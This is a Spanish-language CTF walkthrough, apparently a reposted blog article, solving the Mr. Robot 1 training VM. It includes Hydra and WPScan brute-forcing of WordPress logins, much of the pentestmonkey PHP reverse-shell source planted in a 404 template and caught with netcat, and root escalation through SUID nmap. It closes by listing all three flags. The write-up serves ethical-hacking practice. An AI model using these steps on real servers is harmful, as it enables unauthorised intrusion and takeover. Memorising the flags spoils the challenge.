Mr. Robot es una popular serie de TV que narra las vivencias de Ellon Elliot, un hacker de élite. Hoy mostraremos Capture the Flag (CTF), realizado por uno de los estudiantes del curso de hacking ético del Instituto Internacional de Seguridad Cibernética (IICS).
- Para las pruebas usaremos Kali Linux 2019.1 amd64 y Mr. Robot 1. Descargue Kali de: https://ift.tt/1xv2Ev9
- Descargue Mr. robot 1 https://ift.tt/29cvsJU Estamos utilizando Virtual box para completar este CTF
- Descargue Virtual box desde: https://ift.tt/v3lCG7
- Después de descargar, abra mr.robot vm. Inicie la máquina virtual
- Después de eso, Mr. Robot 1 VM comenzará
- Cambie la configuración del adaptador VM Mr.robot 1 a adaptador de puente
- Después de cambiar la configuración de red, abra Kali Linux y escriba el comando netdiscover para encontrar las direcciones IP abiertas, esto ayudará a encontrar la dirección IP de Mr. Robot VM
- Nuestro objetivo es 192.168.1.4. Abra el navegador web y escriba 192.168.1.4
- Para posteriores labores de recolección de información utilizaremos archivos generadores de sitemaps para encontrar a qué páginas se les permite acceder. Escriba 192.168.1.4/robots.txt
- Al abrir 192.168.1.4 en el navegador, se abre esto:
- En Kali, abra el terminal y escriba wget 192.168.1.4/fsocity.dic
- Y luego escriba wget 192.168.1.4/key-1-of-3.txt
root@kali:/home/iicybersecurity/Desktop# wget 192.168.1.4/fsocity.dic --2019-09-28 01:44:33-- http://192.168.1.4/fsocity.dic Connecting to 192.168.1.4:80… connected. HTTP request sent, awaiting response… 200 OK Length: 7245381 (6.9M) [text/x-c] Saving to: ‘fsocity.dic’ fsocity.dic 100%[==================================================>] 6.91M 35.8MB/s in 0.2s 2019-09-28 01:44:34 (35.8 MB/s) - ‘fsocity.dic’ saved [7245381/7245381] root@kali:/home/iicybersecurity/Desktop# wget 192.168.1.4/key-1-of-3.txt --2019-09-28 01:44:54-- http://192.168.1.4/key-1-of-3.txt Connecting to 192.168.1.4:80… connected. HTTP request sent, awaiting response… 200 OK Length: 33 [text/plain] Saving to: ‘key-1-of-3.txt’ key-1-of-3.txt 100%[==================================================>] 33 --.-KB/s in 0s 2019-09-28 01:44:54 (4.68 MB/s) - ‘key-1-of-3.txt’ saved [33/33]
- Aquí tenemos la 1ra clave. Escriba cat key-1-of-3.txt
- Según el investigador den hacking ético del Instituto Internacional de Seguridad Cibernética (IICS), obtener la clave es fácil si tiene los conceptos claros
root@kali:/home/iicybersecurity/Desktop# cat key-1-of-3.txt 073403c8a58a1f80d943455fb30724b9
- Para obtener el resto de las claves tenemos que acceder a Mr.robot 1 VM
- Escriba cat fsociety.dic
root@kali:/home/iicybersecurity/Desktop# cat fsocity.dic true false wikia from the now Wikia extensions scss window http var page Robot Elliot styles and document mrrobot com ago function eps1 null chat user Special GlobalNavigation images net push category Alderson lang nocookie ext his output SLOTNAME
- Escriba cat fsocity.dic | sort -u | uniq> wordlist.dic para crear una lista de palabras
root@kali:/home/iicybersecurity/Desktop# cat fsocity.dic | sort -u | uniq > wordlist.dic root@kali:/home/iicybersecurity/Desktop#
- Ahora usaremos nikto, escriba nikto -h 192.168.1.4 para encontrar páginas web permitidas
- 192.168.1.4 es nuestro objetivo
root@kali:/home/iicybersecurity/Desktop# nikto -h 192.168.1.4 - Nikto v2.1.6 Target IP: 192.168.1.4 Target Hostname: 192.168.1.4 Target Port: 80 + Start Time: 2019-09-28 01:55:04 (GMT-4) Server: Apache The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type Retrieved x-powered-by header: PHP/5.5.29 No CGI Directories found (use '-C all' to force check all possible dirs) Uncommon header 'tcn' found, with contents: list Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php OSVDB-3092: /admin/: This might be interesting… Uncommon header 'link' found, with contents: http://192.168.1.4/?p=23; rel=shortlink /wp-links-opml.php: This WordPress script reveals the installed version. OSVDB-3092: /license.txt: License file found may identify site software. /admin/index.html: Admin login page/section found. Cookie wordpress_test_cookie created without the httponly flag /wp-login/: Admin login page/section found. /wordpress: A WordPress installation was found. /wp-admin/wp-login.php: WordPress login found /wordpresswp-admin/wp-login.php: WordPress login found /blog/wp-login.php: WordPress login found /wp-login.php: WordPress login found /wordpresswp-login.php: WordPress login found 7915 requests: 0 error(s) and 18 item(s) reported on remote host + End Time: 2019-09-28 01:58:38 (GMT-4) (214 seconds) 1 host(s) tested
- Para obtener credenciales de inicio de sesión usaremos Hydra, que está incorporada en Kali Linux
- Escriba hydra -V -L wordlist.dic -p 123 192.168.1.4 http-post-form ‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username’
- -V se usa para el modo detallado
- -L se usa para el nombre de inicio de sesión, estamos usando la lista de palabras que creamos arriba
- -p se usa para probar la contraseña 123
- Hydra regresará http-post-form como objetivo ya ha permitido la página de inicio de sesión
root@kali:/home/iicybersecurity/Desktop# hydra -V -L wordlist.dic -p 123 192.168.1.4 http-post-form '/news.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username' Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-09-28 02:02:19 [DATA] max 16 tasks per 1 server, overall 16 tasks, 11452 login tries (l:11452/p:1), ~716 tries per task
[DATA] attacking http-post-form://192.168.1.4:80/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username
[ATTEMPT] target 192.168.1.4 - login "000" - pass "123" - 1 of 11452 [child 0] (0/0)
[ATTEMPT] target 192.168.1.4 - login "000000" - pass "123" - 2 of 11452 [child 1] (0/0)
[ATTEMPT] target 192.168.1.4 - login "000080" - pass "123" - 3 of 11452 [child 2] (0/0)
[ATTEMPT] target 192.168.1.4 - login "001" - pass "123" - 4 of 11452 [child 3] (0/0)
[ATTEMPT] target 192.168.1.4 - login "002" - pass "123" - 5 of 11452 [child 4] (0/0)
[ATTEMPT] target 192.168.1.4 - login "003" - pass "123" - 6 of 11452 [child 5] (0/0)
[ATTEMPT] target 192.168.1.4 - login "0032" - pass "123" - 7 of 11452 [child 6] (0/0)
[ATTEMPT] target 192.168.1.4 - login "003s" - pass "123" - 8 of 11452 [child 7] (0/0)
[ATTEMPT] target 192.168.1.4 - login "004" - pass "123" - 9 of 11452 [child 8] (0/0)
[ATTEMPT] target 192.168.1.4 - login "00480" - pass "123" - 10 of 11452 [child 9] (0/0)
[ATTEMPT] target 192.168.1.4 - login "004s" - pass "123" - 11 of 11452 [child 10] (0/0)
[ATTEMPT] target 192.168.1.4 - login "005s" - pass "123" - 12 of 11452 [child 11] (0/0)
[ATTEMPT] target 192.168.1.4 - login "006s" - pass "123" - 13 of 11452 [child 12] (0/0)
[ATTEMPT] target 192.168.1.4 - login "embed" - pass "123" - 5488 of 11452 [child 8] (0/0)
[80][http-post-form] host: 192.168.1.4 login: Elliot password: 123 [80][http-post-form] host: 192.168.1.4 login: elliot password: 123 [ATTEMPT] target 192.168.1.4 - login "Embedded" - pass "123" - 5489 of 11452 child 4 [80][http-post-form] host: 192.168.1.4 login: ELLIOT password: 123 [ATTEMPT] target 192.168.1.4 - login "embodiment" - pass "123" - 5490 of 11452 child 2
- Después de obtener el nombre de usuario: Elliot, encontraremos la contraseña
- Para eso usaremos WPScan
- WPScan también es una herramienta incorporada de Kali Linux para descifrar contraseñas
- Escriba wpscan –url 192.168.1.4 –passwords /home/iicybersecurity/Desktop/wordlist.dic –usernames Elliot
- –URL– 192.168.1.4 es nuestro objetivo.
- –passwords – se utiliza wordlist.dic que hemos creado anteriormente.
- –Username – Elliot se encuentra usando Hydra
root@kali:/home/iicybersecurity/Desktop# wpscan --url 192.168.1.4 --passwords /home/iicybersecurity/Desktop/wordlist.dic --usernames Elliot
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.6.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: http://192.168.1.4/ [+] Started: Sat Sep 28 02:07:13 2019 Interesting Finding(s): [+] http://192.168.1.4/ | Interesting Entries: | - Server: Apache | - X-Mod-Pagespeed: 1.9.32.3-4523 | Found By: Headers (Passive Detection) | Confidence: 100% [+] http://192.168.1.4/robots.txt | Found By: Robots Txt (Aggressive Detection) | Confidence: 100% [+] http://192.168.1.4/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] http://192.168.1.4/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] http://192.168.1.4/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 4.3.20 identified (Latest, released on 2019-09-05). | Detected By: Rss Generator (Aggressive Detection) | - http://192.168.1.4/feed/, https://wordpress.org/?v=4.3.20 | - http://192.168.1.4/comments/feed/, https://wordpress.org/?v=4.3.20 [i] The main theme could not be detected. [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:00 <=============================================> (21 / 21) 100.00% Time: 00:00:00 [i] No Config Backups Found. [+] Performing password attack on Xmlrpc Multicall against 1 user/s [SUCCESS] - Elliot / ER28-0652 All Found Progress Time: 00:00:19 <================================== > (12 / 22) 54.54% ETA: ??:??:?? [i] Valid Combinations Found: | Username: Elliot, Password: ER28-0652 [+] Finished: Sat Sep 28 02:07:35 2019 [+] Requests Done: 63 [+] Cached Requests: 5 [+] Data Sent: 14.907 KB [+] Data Received: 1.282 MB [+] Memory used: 183.5 MB [+] Elapsed time: 00:00:21
- WPScan ha encontrado la contraseña de las credenciales de inicio de sesión. Ahora usaremos este nombre de usuario de inicio de sesión – Elliot y contraseña – ER28-0652
- Arriba puede ver que la página de inicio de sesión se ha abierto
- Ahora tenemos que encontrar las 2 claves restantes
- Para eso necesitamos un shell remoto de este inicio de sesión. Para eso tenemos que cargar el archivo php en el servidor hackeado usando la contraseña de inicio de sesión de WordPress
- Para crear un archivo php, vaya a: http://pentestmonkey.net/tools/web-shells/php-reverse-shell
- Descargue el terminal abierto del código de shell inverso. Escriba wget https://ift.tt/31SuzfJ
- También puede crear su propio shell de reserva PHP, que se ofrece en cursos de exploits ofrecidos por el Instituto Internacional de Seguridad Cibernética
root@kali:/home/iicybersecurity/Downloads# wget http://pentestmonkey.net/tools/php-reverse-shell1.0.tar.gz --2019-09-30 02:01:28-- http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0. Resolving pentestmonkey.net (pentestmonkey.net)… 213.165.242.10, 2001:bd0:100:0:1::1 Connecting to pentestmonkey.net (pentestmonkey.net)|213.165.242.10|:80… connected. HTTP request sent, awaiting response… 200 OK Length: 9018 (8.8K) [application/x-gzip] Saving to: ‘php-reverse-shell-1.0.tar.gz’ php-reverse-shell-1.0.tar.gz 100%[=============================================>] 8.81K --.-K 2019-09-30 02:01:29 (14.9 MB/s) - ‘php-reverse-shell-1.0.tar.gz’ saved [9018/9018]
- Escriba tar -xvzf php-reverse-shell-1.0.tar.gz
root@kali:/home/iicybersecurity/Downloads# tar -xvzf php-reverse-shell-1.0.tar.gz php-reverse-shell-1.0/ php-reverse-shell-1.0/COPYING.GPL php-reverse-shell-1.0/COPYING.PHP-REVERSE-SHELL php-reverse-shell-1.0/php-reverse-shell.php php-reverse-shell-1.0/CHANGELOG
- Escriba cd php-reverse-shell-1.0/ && ls
root@kali:/home/iicybersecurity/Downloads# cd php-reverse-shell-1.0/ root@kali:/home/iicybersecurity/Downloads/php-reverse-shell-1.0# ls CHANGELOG COPYING.GPL COPYING.PHP-REVERSE-SHELL php-reverse-shell.php
- Cargue php-reverse-shell.php a la plantilla 404. Durante la carga, cambie la dirección IP y el número de puerto. Escriba 192.168.1.2 como nuestra dirección IP de Kali Linux y puerto 4444
- Ve a la página de WordPress y sube el archivo php ve a Apariencia <Editor y Ve a Apariencia <Editor <Plantilla 404
- Copie el archivo php-reverse-shell <dot> php
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.1.2'; // CHANGE THIS
$port = 4444; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
==================================================
=================== SNIPPED ======================
==================================================
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
- Abra el terminal y escriba nc -lvp 4444 en el terminal Kali
- Abra el navegador web y escriba https://ift.tt/30T6g02
- Al escribir el comando netcat obtendrá el shell inverso de Mr. Robot VM
root@kali:/home/iicybersecurity/Downloads/php-reverse-shell-1.0# nc -lvp 4444 listening on [any] 4444 … 192.168.1.4: inverse host lookup failed: Unknown host connect to [192.168.1.2] from (UNKNOWN) [192.168.1.4] 48232 Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 G 06:32:42 up 1:37, 0 users, load average: 0.02, 0.07, 0.07 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=1(daemon) gid=1(daemon) groups=1(daemon) /bin/sh: 0: can't access tty; job control turned off
- Escriba Is
$ ls bin boot dev etc home initrd.img lib lib64 lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz $ pwd pwd /
- Escriba python -c ‘import pty; pty.spawn(“/bin/sh”)’ para obtener acceso al directorio de Mr. Robot
$ python -c 'import pty; pty.spawn("/bin/sh")' $ ls ls robot
- Ahora hemos buscado más y hemos encontrado la segunda clave en el directorio de robot. Escriba cd / robot && ls
$ pwd pwd /home/robot $ ls ls key-2-of-3.txt password.raw-md5 $ cat key-2-of-3.txt cat key-2-of-3.txt 822c73956184f694993bede3eb39f959 $ cat password.raw-md5 cat password.raw-md5 robot:c3fcd3d76192e4007dfb496cca67e13b
- Arriba muestra que la 2da clave está encriptada con el hash raw.md5. Vaya a crackstation.net. Y escriba la segunda clave
- Haga clic en crack hashes
- Como puede ver, el resultado muestra caracteres alfabéticos. ABCDEFGHIJKLMNOPQRSTU VWXYZ
- Escriba su – robot e ingrese la contraseña
$ su - robot su - robot Password: abcdefghijklmnopqrstuvwxyz
- Escriba find / -perm -u=s -type f 2>/dev/null para buscar la tercera clave
$ find / -perm -u=s -type f 2>/dev/null find / -perm -u=s -type f 2>/dev/null /bin/ping /bin/umount /bin/mount /bin/ping6 /bin/su /usr/bin/passwd /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd /usr/bin/sudo /usr/local/bin/nmap /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper /usr/lib/pt_chown
- El comando anterior ha mostrado muchos archivos pero estamos más interesados en /usr/local/bin/nmap
- Escriba nmap –interactive &&! Sh. y verá que tenemos privilegios de root
$ nmap --interactive nmap --interactive Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ ) Welcome to Interactive Mode -- press h for help nmap> !sh !sh #
- Escriba cd / root && ls
- Escriba cat key-3-of-3.txt
$ pwd pwd /root cd /root cd /root # ls firstboot_done key-3-of-3.txt # cat key-3-of-3.txt 04787ddef27c3dee1ee161b21670b4e4
- Como puede ver, hemos encontrado la tercera clave.
- Hemos encontrado 3 claves en la primera clave en https://ift.tt/2LSiAct
- La segunda clave estaba en el directorio del robot
- La tercera clave estaba en el directorio raíz
- Según el investigador de hacking ético del Instituto Internacional de Seguridad Cibernética (IICS), los desafíos del CTF son una buena manera de practicar sus habilidades de hacking ético
key-1-of-3.txt - 073403c8a58a1f80d943455fb30724b9 key-2-of-3.txt - 822c73956184f694993bede3eb39f959 key-3-of-3.txt - 04787ddef27c3dee1ee161b21670b4e4
The post MR. Robot 1 – CTF Captura la Bandera. Desafío para hackers éticos appeared first on Noticias de seguridad informática.
Ver Fuente
No hay comentarios.:
Publicar un comentario